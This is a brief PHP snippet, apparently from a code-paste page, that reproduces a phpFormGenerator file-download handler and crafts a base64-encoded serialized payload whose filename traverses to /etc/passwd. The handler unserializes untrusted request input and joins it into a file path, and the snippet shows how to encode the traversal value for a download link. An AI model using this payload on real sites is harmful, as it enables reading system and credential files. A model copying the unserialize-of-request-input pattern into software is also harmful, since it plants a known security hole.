- var_dump: documentation ( source)
- base64_decode: documentation ( source)
- unserialize: documentation ( source)
- serialize: documentation ( source)
- base64_encode: documentation ( source)
<?php
$_GET['filelink'] = 'YToyOntzOjg6InJlY29yZElEIjtzOjEzOiIyMDE2MDIyMy0zYWRmIjtzOjg6ImZpbGVuYW1lIjtzOjUwOiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fQ';
function phpfmg_filman_download() {
var_dump($_REQUEST['filelink']);
if( !isset($_REQUEST['filelink']) )
return ;
$info = unserialize(base64_decode($_REQUEST['filelink']));
if( !isset($info['recordID']) ){
return ;
};
$file = $info['recordID'] . '-' . $info['filename'];
var_dump($file);
//phpfmg_util_download( $file, $info['filename'] );
}
phpfmg_filman_download();
//$name = phpfmg_rename_harmful(trim('Capture.JPG')) ;
$name = '/../../../../../../../../../../../../../etc/passwd';
$filelink= base64_encode( serialize(array('recordID'=>"20160223-3adf", 'filename'=>$name)) );
//echo "?mod=filman&func=download&filelink=" . urlencode($filelink);